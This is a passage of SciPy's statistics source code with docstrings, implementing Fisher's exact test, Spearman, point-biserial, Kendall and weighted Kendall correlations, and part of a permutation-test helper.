# becomes x = (-abs(r) + 1)/2 = 0.5*(1 - abs(r)). (r is cast to float64
# to avoid a TypeError raised by btdtr when r is higher precision.)
ab = n/2 - 1
prob = 2*special.btdtr(ab, ab, 0.5*(1 - abs(np.float64(r))))
return r, prob
def fisher_exact(table, alternative='two-sided'):
"""Perform a Fisher exact test on a 2x2 contingency table.
Parameters
----------
table : array_like of ints
A 2x2 contingency table. Elements must be non-negative integers.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
See the Notes for more details.
Returns
-------
oddsratio : float
This is prior odds ratio and not a posterior estimate.
p_value : float
P-value, the probability of obtaining a distribution at least as
extreme as the one that was actually observed, assuming that the
null hypothesis is true.
See Also
--------
chi2_contingency : Chi-square test of independence of variables in a
contingency table. This can be used as an alternative to
`fisher_exact` when the numbers in the table are large.
barnard_exact : Barnard's exact test, which is a more powerful alternative
than Fisher's exact test for 2x2 contingency tables.
boschloo_exact : Boschloo's exact test, which is a more powerful alternative
than Fisher's exact test for 2x2 contingency tables.
Notes
-----
*Null hypothesis and p-values*
The null hypothesis is that the input table is from the hypergeometric
distribution with parameters (as used in `hypergeom`)
``M = a + b + c + d``, ``n = a + b`` and ``N = a + c``, where the
input table is ``[[a, b], [c, d]]``. This distribution has support
``max(0, N + n - M) <= x <= min(N, n)``, or, in terms of the values
in the input table, ``min(0, a - d) <= x <= a + min(b, c)``. ``x``
can be interpreted as the upper-left element of a 2x2 table, so the
tables in the distribution have form::
[ x n - x ]
[N - x M - (n + N) + x]
For example, if::
table = [6 2]
[1 4]
then the support is ``2 <= x <= 7``, and the tables in the distribution
are::
[2 6] [3 5] [4 4] [5 3] [6 2] [7 1]
[5 0] [4 1] [3 2] [2 3] [1 4] [0 5]
The probability of each table is given by the hypergeometric distribution
``hypergeom.pmf(x, M, n, N)``. For this example, these are (rounded to
three significant digits)::
x 2 3 4 5 6 7
p 0.0163 0.163 0.408 0.326 0.0816 0.00466
These can be computed with::
>>> from scipy.stats import hypergeom
>>> table = np.array([[6, 2], [1, 4]])
>>> M = table.sum()
>>> n = table[0].sum()
>>> N = table[:, 0].sum()
>>> start, end = hypergeom.support(M, n, N)
>>> hypergeom.pmf(np.arange(start, end+1), M, n, N)
array([0.01631702, 0.16317016, 0.40792541, 0.32634033, 0.08158508,
0.004662 ])
The two-sided p-value is the probability that, under the null hypothesis,
a random table would have a probability equal to or less than the
probability of the input table. For our example, the probability of
the input table (where ``x = 6``) is 0.0816. The x values where the
probability does not exceed this are 2, 6 and 7, so the two-sided p-value
is ``0.0163 + 0.0816 + 0.00466 ~= 0.10256``::
>>> from scipy.stats import fisher_exact
>>> oddsr, p = fisher_exact(table, alternative='two-sided')
>>> p
0.10256410256410257
The one-sided p-value for ``alternative='greater'`` is the probability
that a random table has ``x >= a``, which in our example is ``x >= 6``,
or ``0.0816 + 0.00466 ~= 0.08626``::
>>> oddsr, p = fisher_exact(table, alternative='greater')
>>> p
0.08624708624708627
This is equivalent to computing the survival function of the
distribution at ``x = 5`` (one less than ``x`` from the input table,
because we want to include the probability of ``x = 6`` in the sum)::
>>> hypergeom.sf(5, M, n, N)
0.08624708624708627
For ``alternative='less'``, the one-sided p-value is the probability
that a random table has ``x <= a``, (i.e. ``x <= 6`` in our example),
or ``0.0163 + 0.163 + 0.408 + 0.326 + 0.0816 ~= 0.9949``::
>>> oddsr, p = fisher_exact(table, alternative='less')
>>> p
0.9953379953379957
This is equivalent to computing the cumulative distribution function
of the distribution at ``x = 6``:
>>> hypergeom.cdf(6, M, n, N)
0.9953379953379957
*Odds ratio*
The calculated odds ratio is different from the one R uses. This SciPy
implementation returns the (more common) "unconditional Maximum
Likelihood Estimate", while R uses the "conditional Maximum Likelihood
Estimate".
Examples
--------
Say we spend a few days counting whales and sharks in the Atlantic and
Indian oceans. In the Atlantic ocean we find 8 whales and 1 shark, in the
Indian ocean 2 whales and 5 sharks. Then our contingency table is::
Atlantic Indian
whales 8 2
sharks 1 5
We use this table to find the p-value:
>>> from scipy.stats import fisher_exact
>>> oddsratio, pvalue = fisher_exact([[8, 2], [1, 5]])
>>> pvalue
0.0349...
The probability that we would observe this or an even more imbalanced ratio
by chance is about 3.5%. A commonly used significance level is 5%--if we
adopt that, we can therefore conclude that our observed imbalance is
statistically significant; whales prefer the Atlantic while sharks prefer
the Indian ocean.
"""
hypergeom = distributions.hypergeom
# int32 is not enough for the algorithm
c = np.asarray(table, dtype=np.int64)
if not c.shape == (2, 2):
raise ValueError("The input `table` must be of shape (2, 2).")
if np.any(c < 0):
raise ValueError("All values in `table` must be nonnegative.")
if 0 in c.sum(axis=0) or 0 in c.sum(axis=1):
# If both values in a row or column are zero, the p-value is 1 and
# the odds ratio is NaN.
return np.nan, 1.0
if c[1, 0] > 0 and c[0, 1] > 0:
oddsratio = c[0, 0] * c[1, 1] / (c[1, 0] * c[0, 1])
else:
oddsratio = np.inf
n1 = c[0, 0] + c[0, 1]
n2 = c[1, 0] + c[1, 1]
n = c[0, 0] + c[1, 0]
def binary_search(n, n1, n2, side):
"""Binary search for where to begin halves in two-sided test."""
if side == "upper":
minval = mode
maxval = n
else:
minval = 0
maxval = mode
guess = -1
while maxval - minval > 1:
if maxval == minval + 1 and guess == minval:
guess = maxval
else:
guess = (maxval + minval) // 2
pguess = hypergeom.pmf(guess, n1 + n2, n1, n)
if side == "upper":
ng = guess - 1
else:
ng = guess + 1
if pguess <= pexact < hypergeom.pmf(ng, n1 + n2, n1, n):
break
elif pguess < pexact:
maxval = guess
else:
minval = guess
if guess == -1:
guess = minval
if side == "upper":
while guess > 0 and \
hypergeom.pmf(guess, n1 + n2, n1, n) < pexact * epsilon:
guess -= 1
while hypergeom.pmf(guess, n1 + n2, n1, n) > pexact / epsilon:
guess += 1
else:
while hypergeom.pmf(guess, n1 + n2, n1, n) < pexact * epsilon:
guess += 1
while guess > 0 and \
hypergeom.pmf(guess, n1 + n2, n1, n) > pexact / epsilon:
guess -= 1
return guess
if alternative == 'less':
pvalue = hypergeom.cdf(c[0, 0], n1 + n2, n1, n)
elif alternative == 'greater':
# Same formula as the 'less' case, but with the second column.
pvalue = hypergeom.cdf(c[0, 1], n1 + n2, n1, c[0, 1] + c[1, 1])
elif alternative == 'two-sided':
mode = int((n + 1) * (n1 + 1) / (n1 + n2 + 2))
pexact = hypergeom.pmf(c[0, 0], n1 + n2, n1, n)
pmode = hypergeom.pmf(mode, n1 + n2, n1, n)
epsilon = 1 - 1e-4
if np.abs(pexact - pmode) / np.maximum(pexact, pmode) <= 1 - epsilon:
return oddsratio, 1.
elif c[0, 0] < mode:
plower = hypergeom.cdf(c[0, 0], n1 + n2, n1, n)
if hypergeom.pmf(n, n1 + n2, n1, n) > pexact / epsilon:
return oddsratio, plower
guess = binary_search(n, n1, n2, "upper")
pvalue = plower + hypergeom.sf(guess - 1, n1 + n2, n1, n)
else:
pupper = hypergeom.sf(c[0, 0] - 1, n1 + n2, n1, n)
if hypergeom.pmf(0, n1 + n2, n1, n) > pexact / epsilon:
return oddsratio, pupper
guess = binary_search(n, n1, n2, "lower")
pvalue = pupper + hypergeom.cdf(guess, n1 + n2, n1, n)
else:
msg = "`alternative` should be one of {'two-sided', 'less', 'greater'}"
raise ValueError(msg)
pvalue = min(pvalue, 1.0)
return oddsratio, pvalue
class SpearmanRConstantInputWarning(RuntimeWarning):
"""Warning generated by `spearmanr` when an input is constant."""
def __init__(self, msg=None):
if msg is None:
msg = ("An input array is constant; the correlation coefficient "
"is not defined.")
self.args = (msg,)
SpearmanrResult = namedtuple('SpearmanrResult', ('correlation', 'pvalue'))
def spearmanr(a, b=None, axis=0, nan_policy='propagate',
alternative='two-sided'):
"""Calculate a Spearman correlation coefficient with associated p-value.
The Spearman rank-order correlation coefficient is a nonparametric measure
of the monotonicity of the relationship between two datasets. Unlike the
Pearson correlation, the Spearman correlation does not assume that both
datasets are normally distributed. Like other correlation coefficients,
this one varies between -1 and +1 with 0 implying no correlation.
Correlations of -1 or +1 imply an exact monotonic relationship. Positive
correlations imply that as x increases, so does y. Negative correlations
imply that as x increases, y decreases.
The p-value roughly indicates the probability of an uncorrelated system
producing datasets that have a Spearman correlation at least as extreme
as the one computed from these datasets. The p-values are not entirely
reliable but are probably reasonable for datasets larger than 500 or so.
Parameters
----------
a, b : 1D or 2D array_like, b is optional
One or two 1-D or 2-D arrays containing multiple variables and
observations. When these are 1-D, each represents a vector of
observations of a single variable. For the behavior in the 2-D case,
see under ``axis``, below.
Both arrays need to have the same length in the ``axis`` dimension.
axis : int or None, optional
If axis=0 (default), then each column represents a variable, with
observations in the rows. If axis=1, the relationship is transposed:
each row represents a variable, while the columns contain observations.
If axis=None, then both arrays will be raveled.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis. Default is 'two-sided'.
The following options are available:
* 'two-sided': the correlation is nonzero
* 'less': the correlation is negative (less than zero)
* 'greater': the correlation is positive (greater than zero)
.. versionadded:: 1.7.0
Returns
-------
correlation : float or ndarray (2-D square)
Spearman correlation matrix or correlation coefficient (if only 2
variables are given as parameters. Correlation matrix is square with
length equal to total number of variables (columns or rows) in ``a``
and ``b`` combined.
pvalue : float
The p-value for a hypothesis test whose null hypotheisis
is that two sets of data are uncorrelated. See `alternative` above
for alternative hypotheses. `pvalue` has the same
shape as `correlation`.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Section 14.7
Examples
--------
>>> from scipy import stats
>>> stats.spearmanr([1,2,3,4,5], [5,6,7,8,7])
SpearmanrResult(correlation=0.82078..., pvalue=0.08858...)
>>> rng = np.random.default_rng()
>>> x2n = rng.standard_normal((100, 2))
>>> y2n = rng.standard_normal((100, 2))
>>> stats.spearmanr(x2n)
SpearmanrResult(correlation=-0.07960396039603959, pvalue=0.4311168705769747)
>>> stats.spearmanr(x2n[:,0], x2n[:,1])
SpearmanrResult(correlation=-0.07960396039603959, pvalue=0.4311168705769747)
>>> rho, pval = stats.spearmanr(x2n, y2n)
>>> rho
array([[ 1. , -0.07960396, -0.08314431, 0.09662166],
[-0.07960396, 1. , -0.14448245, 0.16738074],
[-0.08314431, -0.14448245, 1. , 0.03234323],
[ 0.09662166, 0.16738074, 0.03234323, 1. ]])
>>> pval
array([[0. , 0.43111687, 0.41084066, 0.33891628],
[0.43111687, 0. , 0.15151618, 0.09600687],
[0.41084066, 0.15151618, 0. , 0.74938561],
[0.33891628, 0.09600687, 0.74938561, 0. ]])
>>> rho, pval = stats.spearmanr(x2n.T, y2n.T, axis=1)
>>> rho
array([[ 1. , -0.07960396, -0.08314431, 0.09662166],
[-0.07960396, 1. , -0.14448245, 0.16738074],
[-0.08314431, -0.14448245, 1. , 0.03234323],
[ 0.09662166, 0.16738074, 0.03234323, 1. ]])
>>> stats.spearmanr(x2n, y2n, axis=None)
SpearmanrResult(correlation=0.044981624540613524, pvalue=0.5270803651336189)
>>> stats.spearmanr(x2n.ravel(), y2n.ravel())
SpearmanrResult(correlation=0.044981624540613524, pvalue=0.5270803651336189)
>>> rng = np.random.default_rng()
>>> xint = rng.integers(10, size=(100, 2))
>>> stats.spearmanr(xint)
SpearmanrResult(correlation=0.09800224850707953, pvalue=0.3320271757932076)
"""
if axis is not None and axis > 1:
raise ValueError("spearmanr only handles 1-D or 2-D arrays, "
"supplied axis argument {}, please use only "
"values 0, 1 or None for axis".format(axis))
a, axisout = _chk_asarray(a, axis)
if a.ndim > 2:
raise ValueError("spearmanr only handles 1-D or 2-D arrays")
if b is None:
if a.ndim < 2:
raise ValueError("`spearmanr` needs at least 2 "
"variables to compare")
else:
# Concatenate a and b, so that we now only have to handle the case
# of a 2-D `a`.
b, _ = _chk_asarray(b, axis)
if axisout == 0:
a = np.column_stack((a, b))
else:
a = np.row_stack((a, b))
n_vars = a.shape[1 - axisout]
n_obs = a.shape[axisout]
if n_obs <= 1:
# Handle empty arrays or single observations.
return SpearmanrResult(np.nan, np.nan)
if axisout == 0:
if (a[:, 0][0] == a[:, 0]).all() or (a[:, 1][0] == a[:, 1]).all():
# If an input is constant, the correlation coefficient
# is not defined.
warnings.warn(SpearmanRConstantInputWarning())
return SpearmanrResult(np.nan, np.nan)
else: # case when axisout == 1 b/c a is 2 dim only
if (a[0, :][0] == a[0, :]).all() or (a[1, :][0] == a[1, :]).all():
# If an input is constant, the correlation coefficient
# is not defined.
warnings.warn(SpearmanRConstantInputWarning())
return SpearmanrResult(np.nan, np.nan)
a_contains_nan, nan_policy = _contains_nan(a, nan_policy)
variable_has_nan = np.zeros(n_vars, dtype=bool)
if a_contains_nan:
if nan_policy == 'omit':
return mstats_basic.spearmanr(a, axis=axis, nan_policy=nan_policy,
alternative=alternative)
elif nan_policy == 'propagate':
if a.ndim == 1 or n_vars <= 2:
return SpearmanrResult(np.nan, np.nan)
else:
# Keep track of variables with NaNs, set the outputs to NaN
# only for those variables
variable_has_nan = np.isnan(a).any(axis=axisout)
a_ranked = np.apply_along_axis(rankdata, axisout, a)
rs = np.corrcoef(a_ranked, rowvar=axisout)
dof = n_obs - 2 # degrees of freedom
# rs can have elements equal to 1, so avoid zero division warnings
with np.errstate(divide='ignore'):
# clip the small negative values possibly caused by rounding
# errors before taking the square root
t = rs * np.sqrt((dof/((rs+1.0)*(1.0-rs))).clip(0))
t, prob = _ttest_finish(dof, t, alternative)
# For backwards compatibility, return scalars when comparing 2 columns
if rs.shape == (2, 2):
return SpearmanrResult(rs[1, 0], prob[1, 0])
else:
rs[variable_has_nan, :] = np.nan
rs[:, variable_has_nan] = np.nan
return SpearmanrResult(rs, prob)
PointbiserialrResult = namedtuple('PointbiserialrResult',
('correlation', 'pvalue'))
def pointbiserialr(x, y):
r"""Calculate a point biserial correlation coefficient and its p-value.
The point biserial correlation is used to measure the relationship
between a binary variable, x, and a continuous variable, y. Like other
correlation coefficients, this one varies between -1 and +1 with 0
implying no correlation. Correlations of -1 or +1 imply a determinative
relationship.
This function uses a shortcut formula but produces the same result as
`pearsonr`.
Parameters
----------
x : array_like of bools
Input array.
y : array_like
Input array.
Returns
-------
correlation : float
R value.
pvalue : float
Two-sided p-value.
Notes
-----
`pointbiserialr` uses a t-test with ``n-1`` degrees of freedom.
It is equivalent to `pearsonr`.
The value of the point-biserial correlation can be calculated from:
.. math::
r_{pb} = \frac{\overline{Y_{1}} -
\overline{Y_{0}}}{s_{y}}\sqrt{\frac{N_{1} N_{2}}{N (N - 1))}}
Where :math:`Y_{0}` and :math:`Y_{1}` are means of the metric
observations coded 0 and 1 respectively; :math:`N_{0}` and :math:`N_{1}`
are number of observations coded 0 and 1 respectively; :math:`N` is the
total number of observations and :math:`s_{y}` is the standard
deviation of all the metric observations.
A value of :math:`r_{pb}` that is significantly different from zero is
completely equivalent to a significant difference in means between the two
groups. Thus, an independent groups t Test with :math:`N-2` degrees of
freedom may be used to test whether :math:`r_{pb}` is nonzero. The
relation between the t-statistic for comparing two independent groups and
:math:`r_{pb}` is given by:
.. math::
t = \sqrt{N - 2}\frac{r_{pb}}{\sqrt{1 - r^{2}_{pb}}}
References
----------
.. [1] J. Lev, "The Point Biserial Coefficient of Correlation", Ann. Math.
Statist., Vol. 20, no.1, pp. 125-126, 1949.
.. [2] R.F. Tate, "Correlation Between a Discrete and a Continuous
Variable. Point-Biserial Correlation.", Ann. Math. Statist., Vol. 25,
np. 3, pp. 603-607, 1954.
.. [3] D. Kornbrot "Point Biserial Correlation", In Wiley StatsRef:
Statistics Reference Online (eds N. Balakrishnan, et al.), 2014.
:doi:`10.1002/9781118445112.stat06227`
Examples
--------
>>> from scipy import stats
>>> a = np.array([0, 0, 0, 1, 1, 1, 1])
>>> b = np.arange(7)
>>> stats.pointbiserialr(a, b)
(0.8660254037844386, 0.011724811003954652)
>>> stats.pearsonr(a, b)
(0.86602540378443871, 0.011724811003954626)
>>> np.corrcoef(a, b)
array([[ 1. , 0.8660254],
[ 0.8660254, 1. ]])
"""
rpb, prob = pearsonr(x, y)
return PointbiserialrResult(rpb, prob)
KendalltauResult = namedtuple('KendalltauResult', ('correlation', 'pvalue'))
def kendalltau(x, y, initial_lexsort=None, nan_policy='propagate',
method='auto', variant='b', alternative='two-sided'):
"""Calculate Kendall's tau, a correlation measure for ordinal data.
Kendall's tau is a measure of the correspondence between two rankings.
Values close to 1 indicate strong agreement, and values close to -1
indicate strong disagreement. This implements two variants of Kendall's
tau: tau-b (the default) and tau-c (also known as Stuart's tau-c). These
differ only in how they are normalized to lie within the range -1 to 1;
the hypothesis tests (their p-values) are identical. Kendall's original
tau-a is not implemented separately because both tau-b and tau-c reduce
to tau-a in the absence of ties.
Parameters
----------
x, y : array_like
Arrays of rankings, of the same shape. If arrays are not 1-D, they
will be flattened to 1-D.
initial_lexsort : bool, optional
Unused (deprecated).
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
method : {'auto', 'asymptotic', 'exact'}, optional
Defines which method is used to calculate the p-value [5]_.
The following options are available (default is 'auto'):
* 'auto': selects the appropriate method based on a trade-off
between speed and accuracy
* 'asymptotic': uses a normal approximation valid for large samples
* 'exact': computes the exact p-value, but can only be used if no ties
are present. As the sample size increases, the 'exact' computation
time may grow and the result may lose some precision.
variant : {'b', 'c'}, optional
Defines which variant of Kendall's tau is returned. Default is 'b'.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis. Default is 'two-sided'.
The following options are available:
* 'two-sided': the rank correlation is nonzero
* 'less': the rank correlation is negative (less than zero)
* 'greater': the rank correlation is positive (greater than zero)
Returns
-------
correlation : float
The tau statistic.
pvalue : float
The p-value for a hypothesis test whose null hypothesis is
an absence of association, tau = 0.
See Also
--------
spearmanr : Calculates a Spearman rank-order correlation coefficient.
theilslopes : Computes the Theil-Sen estimator for a set of points (x, y).
weightedtau : Computes a weighted version of Kendall's tau.
Notes
-----
The definition of Kendall's tau that is used is [2]_::
tau_b = (P - Q) / sqrt((P + Q + T) * (P + Q + U))
tau_c = 2 (P - Q) / (n**2 * (m - 1) / m)
where P is the number of concordant pairs, Q the number of discordant
pairs, T the number of ties only in `x`, and U the number of ties only in
`y`. If a tie occurs for the same pair in both `x` and `y`, it is not
added to either T or U. n is the total number of samples, and m is the
number of unique values in either `x` or `y`, whichever is smaller.
References
----------
.. [1] Maurice G. Kendall, "A New Measure of Rank Correlation", Biometrika
Vol. 30, No. 1/2, pp. 81-93, 1938.
.. [2] Maurice G. Kendall, "The treatment of ties in ranking problems",
Biometrika Vol. 33, No. 3, pp. 239-251. 1945.
.. [3] Gottfried E. Noether, "Elements of Nonparametric Statistics", John
Wiley & Sons, 1967.
.. [4] Peter M. Fenwick, "A new data structure for cumulative frequency
tables", Software: Practice and Experience, Vol. 24, No. 3,
pp. 327-336, 1994.
.. [5] Maurice G. Kendall, "Rank Correlation Methods" (4th Edition),
Charles Griffin & Co., 1970.
Examples
--------
>>> from scipy import stats
>>> x1 = [12, 2, 1, 12, 2]
>>> x2 = [1, 4, 7, 1, 0]
>>> tau, p_value = stats.kendalltau(x1, x2)
>>> tau
-0.47140452079103173
>>> p_value
0.2827454599327748
"""
x = np.asarray(x).ravel()
y = np.asarray(y).ravel()
if x.size != y.size:
raise ValueError("All inputs to `kendalltau` must be of the same "
f"size, found x-size {x.size} and y-size {y.size}")
elif not x.size or not y.size:
# Return NaN if arrays are empty
return KendalltauResult(np.nan, np.nan)
# check both x and y
cnx, npx = _contains_nan(x, nan_policy)
cny, npy = _contains_nan(y, nan_policy)
contains_nan = cnx or cny
if npx == 'omit' or npy == 'omit':
nan_policy = 'omit'
if contains_nan and nan_policy == 'propagate':
return KendalltauResult(np.nan, np.nan)
elif contains_nan and nan_policy == 'omit':
x = ma.masked_invalid(x)
y = ma.masked_invalid(y)
if variant == 'b':
return mstats_basic.kendalltau(x, y, method=method, use_ties=True,
alternative=alternative)
else:
message = ("nan_policy='omit' is currently compatible only with "
"variant='b'.")
raise ValueError(message)
if initial_lexsort is not None: # deprecate to drop!
warnings.warn('"initial_lexsort" is gone!')
def count_rank_tie(ranks):
cnt = np.bincount(ranks).astype('int64', copy=False)
cnt = cnt[cnt > 1]
return ((cnt * (cnt - 1) // 2).sum(),
(cnt * (cnt - 1.) * (cnt - 2)).sum(),
(cnt * (cnt - 1.) * (2*cnt + 5)).sum())
size = x.size
perm = np.argsort(y) # sort on y and convert y to dense ranks
x, y = x[perm], y[perm]
y = np.r_[True, y[1:] != y[:-1]].cumsum(dtype=np.intp)
# stable sort on x and convert x to dense ranks
perm = np.argsort(x, kind='mergesort')
x, y = x[perm], y[perm]
x = np.r_[True, x[1:] != x[:-1]].cumsum(dtype=np.intp)
dis = _kendall_dis(x, y) # discordant pairs
obs = np.r_[True, (x[1:] != x[:-1]) | (y[1:] != y[:-1]), True]
cnt = np.diff(np.nonzero(obs)[0]).astype('int64', copy=False)
ntie = (cnt * (cnt - 1) // 2).sum() # joint ties
xtie, x0, x1 = count_rank_tie(x) # ties in x, stats
ytie, y0, y1 = count_rank_tie(y) # ties in y, stats
tot = (size * (size - 1)) // 2
if xtie == tot or ytie == tot:
return KendalltauResult(np.nan, np.nan)
# Note that tot = con + dis + (xtie - ntie) + (ytie - ntie) + ntie
# = con + dis + xtie + ytie - ntie
con_minus_dis = tot - xtie - ytie + ntie - 2 * dis
if variant == 'b':
tau = con_minus_dis / np.sqrt(tot - xtie) / np.sqrt(tot - ytie)
elif variant == 'c':
minclasses = min(len(set(x)), len(set(y)))
tau = 2*con_minus_dis / (size**2 * (minclasses-1)/minclasses)
else:
raise ValueError(f"Unknown variant of the method chosen: {variant}. "
"variant must be 'b' or 'c'.")
# Limit range to fix computational errors
tau = min(1., max(-1., tau))
# The p-value calculation is the same for all variants since the p-value
# depends only on con_minus_dis.
if method == 'exact' and (xtie != 0 or ytie != 0):
raise ValueError("Ties found, exact method cannot be used.")
if method == 'auto':
if (xtie == 0 and ytie == 0) and (size <= 33 or
min(dis, tot-dis) <= 1):
method = 'exact'
else:
method = 'asymptotic'
if xtie == 0 and ytie == 0 and method == 'exact':
pvalue = mstats_basic._kendall_p_exact(size, tot-dis, alternative)
elif method == 'asymptotic':
# con_minus_dis is approx normally distributed with this variance [3]_
m = size * (size - 1.)
var = ((m * (2*size + 5) - x1 - y1) / 18 +
(2 * xtie * ytie) / m + x0 * y0 / (9 * m * (size - 2)))
z = con_minus_dis / np.sqrt(var)
_, pvalue = _normtest_finish(z, alternative)
else:
raise ValueError(f"Unknown method {method} specified. Use 'auto', "
"'exact' or 'asymptotic'.")
return KendalltauResult(tau, pvalue)
WeightedTauResult = namedtuple('WeightedTauResult', ('correlation', 'pvalue'))
def weightedtau(x, y, rank=True, weigher=None, additive=True):
r"""Compute a weighted version of Kendall's :math:`\tau`.
The weighted :math:`\tau` is a weighted version of Kendall's
:math:`\tau` in which exchanges of high weight are more influential than
exchanges of low weight. The default parameters compute the additive
hyperbolic version of the index, :math:`\tau_\mathrm h`, which has
been shown to provide the best balance between important and
unimportant elements [1]_.
The weighting is defined by means of a rank array, which assigns a
nonnegative rank to each element (higher importance ranks being
associated with smaller values, e.g., 0 is the highest possible rank),
and a weigher function, which assigns a weight based on the rank to
each element. The weight of an exchange is then the sum or the product
of the weights of the ranks of the exchanged elements. The default
parameters compute :math:`\tau_\mathrm h`: an exchange between
elements with rank :math:`r` and :math:`s` (starting from zero) has
weight :math:`1/(r+1) + 1/(s+1)`.
Specifying a rank array is meaningful only if you have in mind an
external criterion of importance. If, as it usually happens, you do
not have in mind a specific rank, the weighted :math:`\tau` is
defined by averaging the values obtained using the decreasing
lexicographical rank by (`x`, `y`) and by (`y`, `x`). This is the
behavior with default parameters. Note that the convention used
here for ranking (lower values imply higher importance) is opposite
to that used by other SciPy statistical functions.
Parameters
----------
x, y : array_like
Arrays of scores, of the same shape. If arrays are not 1-D, they will
be flattened to 1-D.
rank : array_like of ints or bool, optional
A nonnegative rank assigned to each element. If it is None, the
decreasing lexicographical rank by (`x`, `y`) will be used: elements of
higher rank will be those with larger `x`-values, using `y`-values to
break ties (in particular, swapping `x` and `y` will give a different
result). If it is False, the element indices will be used
directly as ranks. The default is True, in which case this
function returns the average of the values obtained using the
decreasing lexicographical rank by (`x`, `y`) and by (`y`, `x`).
weigher : callable, optional
The weigher function. Must map nonnegative integers (zero
representing the most important element) to a nonnegative weight.
The default, None, provides hyperbolic weighing, that is,
rank :math:`r` is mapped to weight :math:`1/(r+1)`.
additive : bool, optional
If True, the weight of an exchange is computed by adding the
weights of the ranks of the exchanged elements; otherwise, the weights
are multiplied. The default is True.
Returns
-------
correlation : float
The weighted :math:`\tau` correlation index.
pvalue : float
Presently ``np.nan``, as the null statistics is unknown (even in the
additive hyperbolic case).
See Also
--------
kendalltau : Calculates Kendall's tau.
spearmanr : Calculates a Spearman rank-order correlation coefficient.
theilslopes : Computes the Theil-Sen estimator for a set of points (x, y).
Notes
-----
This function uses an :math:`O(n \log n)`, mergesort-based algorithm
[1]_ that is a weighted extension of Knight's algorithm for Kendall's
:math:`\tau` [2]_. It can compute Shieh's weighted :math:`\tau` [3]_
between rankings without ties (i.e., permutations) by setting
`additive` and `rank` to False, as the definition given in [1]_ is a
generalization of Shieh's.
NaNs are considered the smallest possible score.
.. versionadded:: 0.19.0
References
----------
.. [1] Sebastiano Vigna, "A weighted correlation index for rankings with
ties", Proceedings of the 24th international conference on World
Wide Web, pp. 1166-1176, ACM, 2015.
.. [2] W.R. Knight, "A Computer Method for Calculating Kendall's Tau with
Ungrouped Data", Journal of the American Statistical Association,
Vol. 61, No. 314, Part 1, pp. 436-439, 1966.
.. [3] Grace S. Shieh. "A weighted Kendall's tau statistic", Statistics &
Probability Letters, Vol. 39, No. 1, pp. 17-24, 1998.
Examples
--------
>>> from scipy import stats
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, 0]
>>> tau, p_value = stats.weightedtau(x, y)
>>> tau
-0.56694968153682723
>>> p_value
nan
>>> tau, p_value = stats.weightedtau(x, y, additive=False)
>>> tau
-0.62205716951801038
NaNs are considered the smallest possible score:
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, np.nan]
>>> tau, _ = stats.weightedtau(x, y)
>>> tau
-0.56694968153682723
This is exactly Kendall's tau:
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, 0]
>>> tau, _ = stats.weightedtau(x, y, weigher=lambda x: 1)
>>> tau
-0.47140452079103173
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, 0]
>>> stats.weightedtau(x, y, rank=None)
WeightedTauResult(correlation=-0.4157652301037516, pvalue=nan)
>>> stats.weightedtau(y, x, rank=None)
WeightedTauResult(correlation=-0.7181341329699028, pvalue=nan)
"""
x = np.asarray(x).ravel()
y = np.asarray(y).ravel()
if x.size != y.size:
raise ValueError("All inputs to `weightedtau` must be "
"of the same size, "
"found x-size %s and y-size %s" % (x.size, y.size))
if not x.size:
# Return NaN if arrays are empty
return WeightedTauResult(np.nan, np.nan)
# If there are NaNs we apply _toint64()
if np.isnan(np.sum(x)):
x = _toint64(x)
if np.isnan(np.sum(y)):
y = _toint64(y)
# Reduce to ranks unsupported types
if x.dtype != y.dtype:
if x.dtype != np.int64:
x = _toint64(x)
if y.dtype != np.int64:
y = _toint64(y)
else:
if x.dtype not in (np.int32, np.int64, np.float32, np.float64):
x = _toint64(x)
y = _toint64(y)
if rank is True:
return WeightedTauResult((
_weightedrankedtau(x, y, None, weigher, additive) +
_weightedrankedtau(y, x, None, weigher, additive)
) / 2, np.nan)
if rank is False:
rank = np.arange(x.size, dtype=np.intp)
elif rank is not None:
rank = np.asarray(rank).ravel()
if rank.size != x.size:
raise ValueError(
"All inputs to `weightedtau` must be of the same size, "
"found x-size %s and rank-size %s" % (x.size, rank.size)
)
return WeightedTauResult(_weightedrankedtau(x, y, rank, weigher, additive),
np.nan)
# FROM MGCPY: https://github.com/neurodata/mgcpy
class _ParallelP:
"""Helper function to calculate parallel p-value."""
def __init__(self, x, y, random_states):
self.x = x
self.y = y
self.random_states = random_states
def __call__(self, index):
order = self.random_states[index].permutation(self.y.shape[0])
permy = self.y[order][:, order]
# calculate permuted stats, store in null distribution
perm_stat = _mgc_stat(self.x, permy)[0]
return perm_stat
def _perm_test(x, y, stat, reps=1000, workers=-1, random_state=None):
r"""Helper function that calculates the p-value. See below for uses.
Parameters
----------
x, y : ndarray
`x` and `y` have shapes `(n, p)` and `(n, q)`.
stat : float
The sample test statistic.
reps : int, optional
The number of replications used to estimate the null when using the
permutation test. The default is 1000 replications.
workers : int or map-like callable, optional
If `workers` is an int the population is subdivided into `workers`
sections and evaluated in parallel (uses
`multiprocessing.Pool <multiprocessing>`). Supply `-1` to use all cores
available to the Process. Alternatively supply a map-like callable,
such as `multiprocessing.Pool.map` for evaluating the population in
parallel. This evaluation is carried out as `workers(func, iterable)`.
Requires that `func` be pickleable.
random_state : {None, int, `numpy.random.Generator`,
`numpy.random.RandomState`}, optional
If `seed` is None (or `np.random`), the `numpy.random.RandomState`
singleton is used.
If `seed` is an int, a new ``RandomState`` instance is used,
seeded with `seed`.
If `seed` is already a ``Generator`` or ``RandomState`` instance then
that instance is used.
Returns
-------
pvalue : float
The sample test p-value.
null_dist : list
